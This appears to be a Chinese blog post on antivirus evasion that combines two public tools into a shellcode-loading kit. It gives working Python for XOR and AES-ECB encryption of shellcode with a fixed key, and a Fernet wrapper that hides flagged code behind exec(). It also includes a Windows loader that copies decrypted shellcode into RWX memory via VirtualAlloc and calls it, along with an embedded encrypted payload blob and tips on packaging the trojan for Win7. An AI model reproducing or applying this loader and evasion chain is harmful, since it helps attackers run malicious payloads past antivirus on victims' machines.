
免杀学习-python代码分析缝合

免杀学习-python代码分析缝合

分析一下市面上的两个工具，站在巨人的肩膀上。

这是一个加密脚本，可以对数据依次做XOR加密和AES加密，用于加密shellcode（base64编码后的bin文件）。

import base64
from Crypto.Cipher import AES

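def add_to_16(s):
    """Encode *s* as UTF-8 and zero-pad it to a multiple of 16 bytes.

    Args:
        s: text (or an object accepted by ``bytes()``) used as an AES key
            or plaintext.

    Returns:
        bytes whose length is a multiple of the 16-byte AES block size
        (an empty input stays empty).

    The padding is applied to the encoded bytes rather than to characters,
    so non-ASCII text still comes out block-aligned (the original counted
    characters, which mis-sized the padding for multi-byte input). Zero
    padding is ambiguous when the data itself ends in NUL bytes; the
    matching decryptor in this post strips trailing NULs.
    """
    data = s.encode('utf8') if isinstance(s, str) else bytes(s)
    remainder = len(data) % 16
    if remainder:
        data += b'\0' * (16 - remainder)
    return data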

def aes_jiami(text):
    """Encrypt *text* with a fixed 16-byte key in AES-ECB and return it as one base64 line.

    The key is hard-coded and ECB mode preserves block-level patterns of the
    plaintext, so this is an obfuscation layer rather than confidentiality.
    """
    # 16/24/32-byte keys select AES-128/192/256; this one is 16 bytes.
    key = 'LeslieCheungKwok'
    cipher = AES.new(add_to_16(key), AES.MODE_ECB)
    raw = cipher.encrypt(add_to_16(text))
    encoded = base64.encodebytes(raw).decode('utf8')
    # encodebytes wraps at 76 columns; collapse it to a single line.
    return encoded.replace('\n', '')

def xor_jiami(s,key):
    """XOR the code point of every character of *s* with the integer *key*.

    Returns a str of the same length; applying the same key again restores
    the input.
    """
    return ''.join(chr(ord(ch) ^ key) for ch in s)


if __name__=='__main__':
    # Placeholder input; the original comment says this is where the
    # shellcode text is read in.
    sc = 'shellcode'
    # XOR first, then AES; the result is a single base64 line.
    output_path = './aes-xor.txt'
    with open(output_path, 'w') as fh:
        fh.write(aes_jiami(xor_jiami(sc, 35)))
#用fernet加密代码的脚本
from cryptography.fernet import Fernet

# Snippets the author reports being flagged by Huorong AV (火绒).
# Placeholder only: 'xxxxxxxxx' stands in for the source text to be wrapped.
ban_code=[b'''
xxxxxxxxx
'''
]

# For every snippet: generate a fresh Fernet key, encrypt the snippet, then
# print the lines of a stub (key, Fernet object, exec of the decrypted bytes).
# The key is printed right beside the ciphertext, so anyone holding the
# output can reverse it: this hides the text from pattern matching, nothing more.
for code in ban_code:
    key =Fernet.generate_key()
    f =Fernet(key)
    enc_pay =f.encrypt(bytes(code))
    output_key ="key= {0}".format(key)
    print(output_key)
    print("f_obj= Fernet(key)")
    output_enc_pay ="enc_pay= {0}".format(enc_pay)
    print(output_enc_pay)
    # The emitted stub runs exec() on whatever decrypts; a Fernet import
    # followed by exec of a decrypted blob is itself a recognisable pattern.
    print("exec(f_obj.decrypt(enc_pay))")
    print("========================================")

Oxyry Python Obfuscator - The most reliable python obfuscator in the world

python代码混淆网址

#加载器
import base64
import ctypes

from Crypto.Cipher import AES

# Windows-only: ctypes.windll does not exist on other platforms.
kernel32 = ctypes.windll.kernel32

def aes_jiemi(s):
    """Reverse of aes_jiami: base64-decode *s*, decrypt with the fixed
    AES-128 key in ECB mode, strip NUL padding and decode as UTF-8."""
    cipher = AES.new(b'LeslieCheungKwok', AES.MODE_ECB)
    raw = base64.decodebytes(s.encode('utf8'))
    plain = cipher.decrypt(raw)
    # Zero padding is removed by stripping trailing NUL bytes.
    return plain.rstrip(b'\0').decode("utf8")

def xor_jiemi(s,key):
    """XOR each character's code point with *key*; identical to xor_jiami,
    since XOR with the same key is its own inverse."""
    return ''.join(chr(ord(ch) ^ key) for ch in s)

def write_memory(buf):
    """Copy *buf* into a newly allocated read-write-execute region.

    Args:
        buf: a ctypes buffer (see run()) whose bytes are copied.

    Returns:
        the address returned by VirtualAlloc (int / void pointer).
    """
    length = len(buf)

    # Declare the return type as a pointer so a 64-bit address is not
    # truncated to ctypes' default c_int.
    kernel32.VirtualAlloc.restype = ctypes.c_void_p
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE:
    # one RWX allocation. From a defender's side, RWX allocation followed
    # by a copy and an indirect call is among the most commonly monitored
    # loader behaviours.
    ptr = kernel32.VirtualAlloc(None, length, 0x3000, 0x40)

    kernel32.RtlMoveMemory.argtypes = (
        ctypes.c_void_p,
        ctypes.c_void_p,
        ctypes.c_size_t)
    kernel32.RtlMoveMemory(ptr, buf, length)
    return ptr


def run(shellcode):
    """Place *shellcode* (bytes) in executable memory and call it in-process.

    Args:
        shellcode: raw bytes to execute; nothing about them is validated.
    """
    # Mutable char buffer holding the raw bytes.
    buf = ctypes.create_string_buffer(shellcode)
    ptr = write_memory(buf)
    # Treat the address as a C function with no arguments and no return
    # value, then call it: control transfers into the copied bytes.
    shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None))
    shell_func()



if __name__ == '__main__':
    # Presumably the output of the first script in this post: base64 text,
    # XOR'd with 35, AES-ECB encrypted and base64-encoded again.
    jiami_sc = 'nNTTwqBntRUVsGzFLXrB54mHCTMUkwOkgFGxbYPdb6zG2uKaUEKY4lK2dT36BaJQ9jZJ4rPVx5n0xGteS5M1f5r/hc9ab2ZAUcUipd/87CD/Vmns9lpZCaj8Cr1BXdsEpO56xJtpurJ9tbar8S+4VIX6cQ2bJefummMWD2tv8upIx8UtZigMvqryLrrQ6RN7Hab87ezQV9t9qtMBhKm2No3LA3mX/oYGWl88CBuMCqEEyntbFMKhbi8PXXDt+GvamHgmSlTPn+M54tLfoAbxy6L/MDId2TX+BrTjrbO53TNJODdgBl7Jn2SH2/ucg7VZpOoscbRSePFQo/+iCp4gqJn9h/alCY85EXuYti/14W7C41f0KSZfp0zPE5fI3lykyHWPVkZoX+LmdDg43pIybdaUgI/G1YLE9rK6o+9cBgr+BrQiehHpvl5Id8N6pKgilMIenPEwlCzEalny0uhKFVT6Kl9idOQZmds1kqLT0nyvem0lt+tffq3+a1ioGWGKybinrDOArR4P0GQrCjsoOAVWZlvuXceM7aZX1aGHEnfMNg7WQb1zfWRp3HCp1bKZ8IP+Fp3fKhpxNiHYAaGMqfBcZbIex1O6O6eg+xnNJ3TzOnQfhvfSMhtt3nzDe8OS5f1PtiMUUnOlXP8uYDlPDL6ZJxEIboziy9YdjsX0bM4A3FrDVlenTpK2wbWlOJnLEoxO7a6093Z6ILY3n201WNJR2bzvNFmBlRD0SvKPJpcB6nAR2pHjra27MNAqYq4oFingkte1G6UZBb2A3n3DyI2DgH9agOO1d4T1p0nYac4B2a/v+9NwmK1C4aQw1lOpqvQuyNS8OyFnGHZMmOkS+aYCR2bLc6vNrMVG7ys553D1mpKgi4vKvowXI/u0GoI/lSL9ehSAoMFaUdoieft2JpzVPRr1aF7JK5OAc6vnzLVASlnKCJb6Pj6MknFDJTruaW'
    # Undo the layers in reverse order: AES, then XOR, then the inner base64.
    sc = xor_jiemi(aes_jiemi(jiami_sc),35)
    shde = base64.b64decode(sc)
    run(shde)

最后编译main就可

这套免杀就是base64+xor+aes最后代码混淆+fernet

最后我改了下里面的加密方式以及一些小东西,缝合了一套自己的免杀,源码我就在这不放了,免得用不了多久就没了。

最后说下踩的一个坑：win10 打包的马在 win7 上没法用怎么办？在 win7 上装一个 32 位 python，然后在 win7 上打包就行了，这样哪里都能运行。注意 win7 装 python 前需要先安装 KB976932 补丁。